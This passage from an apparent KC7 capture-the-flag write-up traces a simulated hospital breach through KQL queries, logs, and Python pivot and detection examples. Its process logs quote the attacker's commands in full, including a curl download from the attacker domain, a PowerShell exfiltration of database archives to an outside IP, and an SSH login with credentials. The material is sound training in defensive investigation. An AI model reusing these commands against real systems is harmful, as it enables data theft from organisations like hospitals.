| where subject =~ "[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨"
| distinct sender;
let bad_domains =
Email
| where sender in (bad_emails)
or reply_to in (bad_emails)
| distinct tostring(parse_url(link).Host);
OutboundNetworkEvents
| where tostring(parse_url(url).Host) in (bad_domains)
| distinct src_ip
| lookup Employees on $left.src_ip == $right.ip_addr
| distinct role, name, src_ip, hostname
| sort by role asc
Query Results
role name src_ip hostname
Database Administrator Roy Trenneman 10.10.0.2 SUPER-DB-SERVER-9000
Interns Judy Tomlinson 10.10.0.54 THSQ-DESKTOP
Interns Eunice Birks 10.10.0.66 CF1D-LAPTOP
Interns Scott Horwath 10.10.0.34 7WSV-MACHINE
Interns Constance Eldredge 10.10.0.61 ZWU6-MACHINE
Interns Anita Hummel 10.10.0.105 C4O7-LAPTOP
Interns Dean Aitken 10.10.0.86 JSJU-MACHINE
Interns Michael Frith 10.10.0.19 UBAA-MACHINE
Interns Monte Baez 10.10.0.35 3ORE-LAPTOP
Interns Michael Bauer 10.10.0.31 7IXV-LAPTOP
Interns Geneva Arthur 10.10.0.110 5QJC-DESKTOP
Interns Joseph Markland 10.10.0.69 P3EX-DESKTOP
Interns Carla Bledsoe 10.10.0.108 AI4T-LAPTOP
Interns Thomas Mccloskey 10.10.0.46 JFJD-MACHINE
Interns Susan Deloatch 10.10.0.117 5VHH-DESKTOP
Resident Doctors Bradley Park 10.10.0.221 1RE1-MACHINE
Resident Doctors Justin Flores 10.10.0.63 S3FA-LAPTOP
Resident Doctors Archie Mireles 10.10.0.78 Y6J9-DESKTOP
Resident Doctors Christina Tate 10.10.0.157 QWTX-DESKTOP
Resident Doctors Claire Nastasi 10.10.0.224 WVGN-MACHINE
Resident Doctors Gary Berger 10.10.0.229 6U1W-LAPTOP
Resident Doctors Scott Thibault 10.10.0.183 XUCT-MACHINE
Resident Doctors Jonathan Bueno 10.10.0.112 KFL4-DESKTOP
Resident Doctors Beatrice Hogg 10.10.0.103 EF2R-DESKTOP
Resident Doctors Elizabeth Harris 10.10.0.175 FXXV-DESKTOP
Resident Doctors Sheldon Pella 10.10.0.133 XBYY-DESKTOP
Resident Doctors Lillian Mcfarland 10.10.0.71 YO0I-MACHINE
Resident Doctors Maudie Frierson 10.10.0.154 9R9Z-MACHINE
Resident Doctors Charles Roberge 10.10.0.166 60BK-LAPTOP
Resident Doctors Harry Barnes 10.10.0.106 SIJP-LAPTOP
Resident Doctors John Walker 10.10.0.187 MBJX-DESKTOP
Resident Doctors Claire Arce 10.10.0.202 CKQF-MACHINE
Resident Doctors Charlene Simpson 10.10.0.167 QNTA-DESKTOP
Resident Doctors Dolores Rader 10.10.0.170 0N1N-LAPTOP
Resident Doctors Melvin Hudgens 10.10.0.96 M8D0-MACHINE
Resident Doctors Jerry Jones 10.10.0.174 ZQHM-LAPTOP
Resident Doctors Edward Williamson 10.10.0.16 QKD1-MACHINE

The IP address that downloaded New_Healthcare_Protocols.docm, followed by UrTottalyPwned.bat, belongs to the Database Administrator Roy Trenneman, who also designed and created the current ERP system in use by the hospital.
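
The pivot chain used in Sections 2 and 3 (campaign subject → sender addresses → link hosts → outbound clicks → employees, then per-file counts) is shown below in Python as an added example; it is not part of the original writeup or of KC7. The three tables are constructed mini-copies built from rows shown above, plus one made-up "Constructed Staffer" row and one benign partner mail to show what the pivot correctly leaves out; the repeat_downloaders step reproduces the observation that the DBA's server fetched a dropper and then UrTottalyPwned.bat 29 days later.

```python
from collections import Counter, defaultdict
from datetime import datetime
from urllib.parse import urlparse
import posixpath

CAMPAIGN_SUBJECT = "[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨"

# Constructed mini-copies of the Email, OutboundNetworkEvents and Employees tables.
EMAILS = [
    {"sender": "healthupdate@gmail.com", "reply_to": "healthupdate@gmail.com",
     "subject": CAMPAIGN_SUBJECT,
     "link": "https://medequipamateurs.org/modules/online/modules/Pediatric_Care_Update.docm"},
    {"sender": "healthupdate@gmail.com", "reply_to": "healthupdate@gmail.com",
     "subject": "[EXTERNAL] 🩺 Vital Update: Groundbreaking Pediatric Care Advances 🚀",
     "link": "http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm"},
    # different sender, but reply_to pivots back to the campaign address
    {"sender": "medstaffinfo@hospitalcomm.org", "reply_to": "healthupdate@gmail.com",
     "subject": "[EXTERNAL] FW: 🚑 Attention Required: Urgent Pediatric Health Procedure Update 🌈",
     "link": "http://takeyatimecarepartners.com/images/images/files/New_Healthcare_Protocols.docm"},
    {"sender": "orders@medequippros.org", "reply_to": "orders@medequippros.org",  # constructed, benign
     "subject": "Spring catalogue", "link": "https://medequippros.org/catalogue.pdf"},
]
OUTBOUND = [
    {"timestamp": "2024-03-04 11:28:18", "src_ip": "10.10.0.2",
     "url": "http://unhealthyrecordsystems.tech/images/images/New_Healthcare_Protocols.docm"},
    {"timestamp": "2024-03-06 12:12:48", "src_ip": "10.10.0.174",
     "url": "https://medequipamateurs.org/modules/online/modules/Pediatric_Care_Update.docm"},
    {"timestamp": "2024-03-10 09:00:00", "src_ip": "10.10.0.50",  # constructed, benign
     "url": "https://medequippros.org/catalogue.pdf"},
    {"timestamp": "2024-03-14 10:37:39", "src_ip": "10.10.0.174",
     "url": "http://takeyatimecarepartners.com/images/images/files/New_Healthcare_Protocols.docm"},
    {"timestamp": "2024-04-02 11:29:37", "src_ip": "10.10.0.2",
     "url": "https://medequipamateurs.org/UrTottalyPwned.bat"},
]
EMPLOYEES = [
    {"name": "Roy Trenneman", "role": "Database Administrator",
     "ip_addr": "10.10.0.2", "hostname": "SUPER-DB-SERVER-9000"},
    {"name": "Jerry Jones", "role": "Resident Doctors",
     "ip_addr": "10.10.0.174", "hostname": "ZQHM-LAPTOP"},
    {"name": "Constructed Staffer", "role": "Support Staff",  # made-up row
     "ip_addr": "10.10.0.50", "hostname": "XXXX-DESKTOP"},
]


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def filename_of(url):
    """parse_path(parse_url(url).Path).Filename"""
    return posixpath.basename(urlparse(url).path)


def phishing_senders(emails, subject=CAMPAIGN_SUBJECT):
    """Email | where subject =~ "..." | distinct sender   (=~ is case-insensitive)"""
    return {e["sender"] for e in emails if e["subject"].casefold() == subject.casefold()}


def malicious_hosts(emails, senders):
    """Email | where sender in (senders) or reply_to in (senders) | distinct Host"""
    return {host_of(e["link"]) for e in emails
            if e["sender"] in senders or e["reply_to"] in senders}


def clicks_on(events, hosts):
    """OutboundNetworkEvents | where Host in (hosts)"""
    return [ev for ev in events if host_of(ev["url"]) in hosts]


def affected_employees(clicks, employees):
    """distinct src_ip | lookup Employees on src_ip == ip_addr | sort by role"""
    by_ip = {emp["ip_addr"]: emp for emp in employees}
    rows = [dict(by_ip[ip], src_ip=ip) for ip in {ev["src_ip"] for ev in clicks} if ip in by_ip]
    return sorted(rows, key=lambda r: (r["role"], r["name"]))


def downloads_by_filename(clicks):
    """summarize count() by Filename"""
    return Counter(filename_of(ev["url"]) for ev in clicks)


def repeat_downloaders(clicks):
    """Source IPs that fetched more than one distinct file from the campaign
    infrastructure, with the days between first and last fetch."""
    fetched = defaultdict(list)
    for ev in clicks:
        ts = datetime.strptime(ev["timestamp"], "%Y-%m-%d %H:%M:%S")
        fetched[ev["src_ip"]].append((ts, filename_of(ev["url"])))
    result = {}
    for ip, items in fetched.items():
        files = sorted({name for _, name in items})
        if len(files) > 1:
            times = sorted(ts for ts, _ in items)
            result[ip] = {"files": files, "span_days": (times[-1] - times[0]).days}
    return result


if __name__ == "__main__":
    hosts = malicious_hosts(EMAILS, phishing_senders(EMAILS))
    hits = clicks_on(OUTBOUND, hosts)
    for row in affected_employees(hits, EMPLOYEES):
        print(row["role"], row["name"], row["src_ip"], row["hostname"])
    print(dict(downloads_by_filename(hits)))
    print(repeat_downloaders(hits))
```

Note that the reply_to condition is what pulls in the medstaffinfo@hospitalcomm.org mail (and so takeyatimecarepartners.com) even though only healthupdate@gmail.com sent the seed subject in this sample.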

I want to check how many instances of these files exist on Azure Crest computers; to do so, I use:

let bad_emails =
Email
| where subject =~ "[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨"
| distinct sender;
let bad_domains =
Email
| where sender in (bad_emails)
or reply_to in (bad_emails)
| distinct tostring(parse_url(link).Host);
OutboundNetworkEvents
| where tostring(parse_url(url).Host) in (bad_domains)
| distinct tostring(parse_path(tostring(parse_url(url).Path)).Filename)
| lookup FileCreationEvents on $left.Filename == $right.filename
| summarize count() by Filename
Query Results
Filename count_
UrTottalyPwned.bat 1
New_Healthcare_Protocols.docm 23
Pediatric_Care_Update.docm 15

A total of 39 files; 38 are dropper files, and one is likely the malware responsible for locking up the database (or destroying it; in any case, the data is inaccessible).

Given these events, I'll investigate the Database Administrator's device.

ProcessEvents
| where hostname == "SUPER-DB-SERVER-9000"
and timestamp >= datetime(2024-03-04 11:28:18.0000)
and process_commandline !contains "SystemApps"
and process_commandline !contains "WindowsApps"
and process_commandline !contains "Edge"
and process_commandline !contains "Teams"
Query Results
This table has been redacted; it only shows the most relevant findings, rather than the entire output of the KQL query above.
timestamp parent_process_name parent_process_hash process_commandline process_name process_hash hostname username
2024-03-04 11:29:21.0000 Explorer.exe 55df41f4f034802c82b219ecc3e3339b518a4dd1ea50371b8eb8de0daa6ef354 Explorer.exe "C:\Users\rotrenneman\Downloads\New_Healthcare_Protocols.docm" Explorer.exe e8f6a9348ea4743447d103eff057f35cb3485456c5b67f9934683d3dd386027e SUPER-DB-SERVER-9000 rotrenneman
2024-03-04 11:29:22.0000 Explorer.exe 088bd1b9347628a59b3b6537becede6519bc3b03e419cea5923754022f2b60ed C:\ProgramData\Heartburn\heartburn.zip heartburn.zip 2849083eaa125abb7b4470fc0a7f7b750d37dd9e8b20072c2498a14117d61de3 SUPER-DB-SERVER-9000 rotrenneman
2024-03-04 13:15:22.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f cmd.exe /c Expand-Archive -Path C: \ProgramData\heartburn.zip -DestinationPath C:\ProgramData\Heartburn cmd.exe 77fe1648d77984e988057b0d63301992addaa99970d0a7a92a9d522838f61b0c SUPER-DB-SERVER-9000 rotrenneman
2024-03-04 14:42:22.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f cmd.exe /c C:\ProgramData\Heartburn\putty.exe -ssh 93.142.203.80 -l have_ya_tried -pw turning_it_off_and_on_again cmd.exe f55450e9502d007a5d594963452d93f9872aa5d082b5ec362a64c2be4b8b9941 SUPER-DB-SERVER-9000 rotrenneman
2024-03-05 14:39:49.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f whoami cmd.exe 6ad6e6583a2a2d83067c4bf6d5d203ac6967496b52098acfa12f00751d01a602 SUPER-DB-SERVER-9000 rotrenneman
2024-03-05 15:32:49.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net user /domain cmd.exe fa9ef7377baf4f016e065a0a8d46bc1622b9ab812c2a0f717e0249e941e6b60a SUPER-DB-SERVER-9000 rotrenneman
2024-03-05 15:49:49.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net group "domain computers" /domain cmd.exe e44cab19d18614698466a708dbd792bd3e86d6624cd7bb55a6e8df32a9ea0c9f SUPER-DB-SERVER-9000 rotrenneman
2024-03-05 15:53:49.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net group "domain admins" /domain cmd.exe eac4215395c4df12f023c7ae26a50daed98161285e19c78258064e1e936eae0f SUPER-DB-SERVER-9000 rotrenneman
2024-03-05 16:17:49.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net localgroup administrators cmd.exe f48c129660214478c54f068ad6be33bdb136d98a826f919f11c70ad40111f3eb SUPER-DB-SERVER-9000 rotrenneman
2024-04-01 15:26:23.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f dbhunter.exe --search --filetype .db .sql .mdb --output C:\\In\\found_databases.txt dbhunter.exe 191fd9ea5f7a66b56c8ba06aa19ba75e85c01bd377eb68b019a1bef20a8fbd36 SUPER-DB-SERVER-9000 rotrenneman
2024-04-01 15:33:23.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f for /f %i in (C:\\In\\found_databases.txt) do copy %i C:\\Out\\ cmd.exe 18915f7dbcf0fdf0c4850c3f3c6dfaeee86ee2308a336971e64041e016d46b15 SUPER-DB-SERVER-9000 rotrenneman
2024-04-01 16:05:36.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f 7z.exe a -t7z C:\\Out\\Financial_Records.7z C:\\Out\\*financial*.db -p finnaberich cmd.exe e1973f0e63aa68e81e20dc0a4b39f2d41c9762c5b0f74acd2a765c1c606f1208 SUPER-DB-SERVER-9000 rotrenneman
2024-04-01 16:23:36.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f 7z.exe a -t7z C:\\Out\\Patient_Records.7z C:\\Out\\*patient*.sql -p i<3mulah cmd.exe b590e0b702031683099aba6fd6d39887083f67a7b4d54fd3df07001abcd7ccf7 SUPER-DB-SERVER-9000 rotrenneman
2024-04-01 17:12:36.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f 7z.exe a -t7z C:\\Out\\Roys_Meme_Collection.7z C:\\Out\\*meme*.mdb -p mommawemadeit cmd.exe ca5bf21d9e885b0811bd066559a3a82299c6eb311cd998b5e984cf15e40570fb SUPER-DB-SERVER-9000 rotrenneman
2024-04-01 17:35:22.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f curl.exe -o C:\ProgramData\Heartburn\anydesk_automation.ps1 https://unhealthyrecordsystems.tech/anydesk_automation.ps1 cmd.exe a95d3d52df491df12c3e306b6f8ef1d1467de8659f71b2b8f4963f1cd29d9a1e SUPER-DB-SERVER-9000 rotrenneman
2024-04-02 11:21:00.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f powershell -File C:\ProgramData\Heartburn\anydesk_automation.ps1 -TargetIP 198.206.213.188 -Password 'thxfodacaviar' -FileToTransfer 'C:\Out\*' powershell.exe eee68e534cebefaa42debb31046c7bce4cd229612ab376c5951cf78513031bfa SUPER-DB-SERVER-9000 rotrenneman
2024-04-02 11:31:47.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f cmd.exe /c C:\\Windows\\Temp\\UrTottalyPwned.bat cmd.exe 8dd091f8cb572ab649a1678db2d683cfd26520f1b02dc51589a8a8fc385a2fff SUPER-DB-SERVER-9000 rotrenneman
2024-04-02 11:53:57.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f cmd.exe /c reg add 'HKCU\Control Panel\Desktop' /v Wallpaper /t REG_SZ /d 'C:\Users\Public\ItWentWrong.jpg' /f && reg add 'HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System' /v Wallpaper /t REG_SZ /d 'C:\Users\Public\ItWentWrong.jpg' /f cmd.exe cc59d11d08489135071b8070da3b3048511c5b76c249c284e2cc494e054afa86 SUPER-DB-SERVER-9000 rotrenneman
2024-04-02 12:44:57.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f cmd.exe /c reg add 'HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop' /v NoChangingWallPaper /t REG_SZ /d 1 /f && reg add 'HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop' /v NoChangingWallPaper /t REG_SZ /d 1 /f cmd.exe 2f0a4a732f33a62b87a3008bc71de6bfec739763a23b031d5119d3a2300b5ad9 SUPER-DB-SERVER-9000 rotrenneman

After Roy opened the macro-enabled Microsoft Word document (.docm), it dropped an archive named heartburn.zip, which is decompressed into a dedicated folder, Heartburn, in the target's ProgramData directory; putty.exe is then executed to establish an SSH (Secure Shell) connection to an attacker-controlled server (in this case, IP address 93.142.203.80, with the username have_ya_tried and the password turning_it_off_and_on_again). The threat actor now has hands-on-keyboard access to the Database Administrator's device and starts executing a typical set of discovery commands:

  • whoami: Displays user, group and privileges information for the user who is currently logged on to the local system. If used without parameters, whoami displays the current domain and user name. [Microsoft Learn]
  • net user /domain: Displays all users belonging to the domain. [Microsoft Learn]
  • net group "domain computers" /domain: Displays all members of the group "domain computers" in the domain. [Microsoft Learn]
  • net group "domain admins" /domain: Displays all members of the group "domain admins" in the domain. [Microsoft Learn]
  • net localgroup administrators: Used without additional parameters, net localgroup <GroupName> displays a list of users or global groups in a local group. [Microsoft Learn]

dbhunter.exe is downloaded from the internet via Microsoft Edge (per FileCreationEvents) and executed to dump a list of all databases it found to a plain-text file in a staging folder. The threat actor uses this list to programmatically copy, compress and encrypt sensitive data (financial records, patient records and Roy's meme collection) from the database(s) on Roy's device (which doubles as the hospital's server). The archives are: Financial_Records.7z (password: finnaberich), Patient_Records.7z (password: i<3mulah) and Roys_Meme_Collection.7z (password: mommawemadeit). The threat actor then uses cURL to download the PowerShell script anydesk_automation.ps1 from their server (unhealthyrecordsystems.tech). This script is run to connect to IP address 198.206.213.188 with the password thxfodacaviar and exfiltrate all previously created .7z archives.

Finally, they execute UrTottalyPwned.bat (downloaded at some point by the threat actor; there are no emails or other signs that Roy navigated to the download on his own), replace the desktop wallpaper on all hospital computers with a taunting image, and disable the ability to manually change it back.
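The three behaviours in the ProcessEvents excerpt (a burst of discovery commands, password-protected 7-Zip archives being staged, and the wallpaper lock via reg add) are the kind of thing a detection would key on. The following is an added example in standalone Python, not the page's KQL and not KC7 code: it re-checks those behaviours over constructed sample rows modelled on the table above. The 2-hour window, the minimum of 3 discovery commands, and the benign rows for UBAA-MACHINE / user mfrith are assumptions for illustration.

```python
"""Added example (not the page's KQL nor KC7 code): behaviours from the
ProcessEvents excerpt re-checked in plain Python over constructed rows.
Thresholds (2 h window, 3 discovery commands) are assumed values."""
from __future__ import annotations

import re
from datetime import datetime, timedelta

# Constructed sample ProcessEvents rows: (timestamp, hostname, username, commandline).
SAMPLE_EVENTS = [
    ("2024-03-05 14:39:49", "SUPER-DB-SERVER-9000", "rotrenneman", "whoami"),
    ("2024-03-05 15:32:49", "SUPER-DB-SERVER-9000", "rotrenneman", "net user /domain"),
    ("2024-03-05 15:49:49", "SUPER-DB-SERVER-9000", "rotrenneman", 'net group "domain computers" /domain'),
    ("2024-03-05 15:53:49", "SUPER-DB-SERVER-9000", "rotrenneman", 'net group "domain admins" /domain'),
    ("2024-03-05 16:17:49", "SUPER-DB-SERVER-9000", "rotrenneman", "net localgroup administrators"),
    ("2024-04-01 16:05:36", "SUPER-DB-SERVER-9000", "rotrenneman",
     "7z.exe a -t7z C:\\Out\\Financial_Records.7z C:\\Out\\*financial*.db -p finnaberich"),
    ("2024-04-01 16:23:36", "SUPER-DB-SERVER-9000", "rotrenneman",
     "7z.exe a -t7z C:\\Out\\Patient_Records.7z C:\\Out\\*patient*.sql -p i<3mulah"),
    ("2024-04-02 11:53:57", "SUPER-DB-SERVER-9000", "rotrenneman",
     "cmd.exe /c reg add 'HKCU\\Control Panel\\Desktop' /v Wallpaper /t REG_SZ /d 'C:\\Users\\Public\\ItWentWrong.jpg' /f"),
    ("2024-04-02 12:44:57", "SUPER-DB-SERVER-9000", "rotrenneman",
     "cmd.exe /c reg add 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\ActiveDesktop' /v NoChangingWallPaper /t REG_SZ /d 1 /f"),
    # Constructed benign noise on another host: a lone whoami and an archive without a password.
    ("2024-04-02 09:00:00", "UBAA-MACHINE", "mfrith", "whoami"),
    ("2024-04-02 09:10:00", "UBAA-MACHINE", "mfrith",
     "7z.exe a -t7z C:\\Users\\mfrith\\notes.7z C:\\Users\\mfrith\\notes\\*"),
]

# The discovery commands listed in the write-up.
DISCOVERY = [
    re.compile(r"^whoami\b", re.I),
    re.compile(r"^net\s+user\b.*/domain", re.I),
    re.compile(r"^net\s+group\b", re.I),
    re.compile(r"^net\s+localgroup\b", re.I),
]
# 7-Zip's -p switch, either attached (-pSECRET) or, as in the logs above, separated by a space.
ARCHIVE_PASSWORD = re.compile(r"(?:^|\s)-p\S*(?:\s|$)")
WALLPAPER_VALUES = ("Wallpaper", "NoChangingWallPaper")


def _parse(events):
    return [(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), host, user, cmd)
            for ts, host, user, cmd in events]


def discovery_bursts(events, window=timedelta(hours=2), min_count=3):
    """Hosts on which at least min_count discovery commands ran within one window."""
    per_host = {}
    for ts, host, _user, cmd in _parse(events):
        if any(p.search(cmd.strip()) for p in DISCOVERY):
            per_host.setdefault(host, []).append(ts)
    flagged = {}
    for host, stamps in per_host.items():
        stamps.sort()
        best = 0
        for i, start in enumerate(stamps):            # sliding window over sorted timestamps
            best = max(best, sum(1 for t in stamps[i:] if t - start <= window))
        if best >= min_count:
            flagged[host] = best
    return flagged


def password_protected_archives(events):
    """(host, archive path) for every 7z 'add' invocation that sets a password."""
    hits = []
    for _ts, host, _user, cmd in _parse(events):
        tokens = cmd.split()
        if len(tokens) < 2 or tokens[0].lower() not in ("7z", "7z.exe", "7za.exe") or tokens[1] != "a":
            continue
        if not ARCHIVE_PASSWORD.search(cmd):
            continue
        archive = next((t for t in tokens[2:] if not t.startswith("-")), None)  # first non-switch argument
        hits.append((host, archive))
    return hits


def wallpaper_policy_changes(events):
    """(host, value name) for reg add commands touching the wallpaper or its lock-down policy."""
    hits = []
    for _ts, host, _user, cmd in _parse(events):
        if not re.search(r"\breg(?:\.exe)?\s+add\b", cmd, re.I):
            continue
        m = re.search(r"/v\s+(\S+)", cmd)
        if m and m.group(1) in WALLPAPER_VALUES:
            hits.append((host, m.group(1)))
    return hits


if __name__ == "__main__":
    print(discovery_bursts(SAMPLE_EVENTS))
    print(password_protected_archives(SAMPLE_EVENTS))
    print(wallpaper_policy_changes(SAMPLE_EVENTS))
```

The discovery check counts commands per host inside a sliding window rather than alerting on a single whoami, which keeps the benign row on UBAA-MACHINE quiet; the archive check deliberately reports the archive path and not the password, since the path is what an analyst needs to trace staging and exfiltration.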

I'll backtrack a bit and look for signs of the threat actor's recon efforts against Azure Crest in the next section.

Section 4 - dERPy Database

Repurposing my previous KQL queries, I use the following to determine any threat actor activity against our website before, during and after the attack:

let bad_emails =
Email
| where subject =~ "[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨"
| distinct sender;
let bad_domains =
Email
| where sender in (bad_emails)
or reply_to in (bad_emails)
| distinct tostring(parse_url(link).Host);
Email
| where tostring(parse_url(link).Host) in (bad_domains)
| distinct tostring(parse_url(link).Host)
| lookup PassiveDns on $left.Host == $right.domain
| distinct ip
| lookup InboundNetworkEvents on $left.ip == $right.src_ip
| sort by timestamp asc
Query Results
ip timestamp method user_agent url status_code
25.126.98.121
115.12.60.150 2024-03-01 00:00:00.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=hospital+network+architecture 200
131.190.102.173 2024-03-01 08:11:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=pediatric+department+internal+procedures 200
16.101.245.182 2024-03-01 09:07:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=employee+contact+list 200
96.120.124.180 2024-03-01 09:29:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=IT+security+protocols 200
135.103.59.74 2024-03-01 10:23:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=How+many+money+does+Azure+Crest+Hospital+have%3F 200
62.121.133.43 2024-03-01 10:59:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Is+Azure+Crest+Hospital+loaded+with+cash%3F 200
93.142.203.80 2024-03-01 11:05:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Does+Azure+Crest+Hospital+have+a+lot+of+money%3F 200
135.103.59.74 2024-03-01 11:16:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Azure+crest+ERP+systems 200
131.190.102.173 2024-03-01 11:51:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Roy+Trenemman+Azure+Crest 200
115.12.60.150 2024-03-01 12:08:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Penny+Pincher+Azure+Crest 200
131.190.102.173 2024-03-01 12:23:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Azure+Crest+Hospital+financial+reports 200
16.101.245.182 2024-03-01 12:35:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Azure+Crest+Hospital+financial+statements 200
131.92.62.82 2024-03-01 13:28:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Azure+Crest+Hospital+financial+data 200
131.92.62.82 2024-03-01 13:45:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Azure+Crest+Hospital+financials 200
131.190.102.173 2024-03-01 13:48:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Azure+Crest+Hospital+Cyber+Security+team 200
115.12.60.150 2024-03-01 14:43:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=Azure+Crest+Hospital+IT+Security+team 200
131.92.62.82 2024-03-01 14:48:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=pediatric+patient+records 200
131.92.62.82 2024-03-01 15:12:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=pediatric+patient+medical+history 200
131.190.102.173 2024-03-01 15:37:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=pediatric+patient+medical+records 200
131.190.102.173 2024-03-01 15:50:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=where+are+pediatric+patient+records+stored 200
115.12.60.150 2024-03-01 16:01:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/search=how+to+access+pediatric+patient+records 200
115.12.60.150 2024-03-01 16:28:22.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/internal_share/medical_records/pediatric 200
93.142.203.80 2024-03-01 16:28:41.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/staff_directory/pediatric_department 200
135.103.59.74 2024-03-01 16:28:50.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/IT_security_policies 200
93.142.203.80 2024-03-01 16:29:14.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/news/penny-pincher-boasts-about-cost-cutting-on-it-department 200
115.12.60.150 2024-03-01 16:30:03.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/news/half-of-it-department-fired 200
16.101.245.182 2024-03-01 16:30:09.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/news/roy-trenemman-joins-azure-crest-to-save-money-on-erp-systems 200
93.142.203.80 2024-03-01 16:30:21.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/news/research/roy-trenemman-invents-new-architecture-database-systems 200
115.12.60.150 2024-03-01 16:30:26.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/news/research/why-running-your-own-erp-systems-is-a-good-idea 200
215.95.144.58 2024-03-01 16:31:06.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/news/research/why-pay-for-expensive-erp-systems-when-you-can-run-your-own 200
115.12.60.150 2024-03-01 16:31:56.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/news/research/how-azure-crest-is-revolutionizing-the-way-it-is-done 200
16.101.245.182 2024-03-01 16:32:39.0000 GET Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00 https://azurecresthospital.med/news/research/run-your-own-erp-systems-on-sqlite-what-could-possibly-go-wrong 200

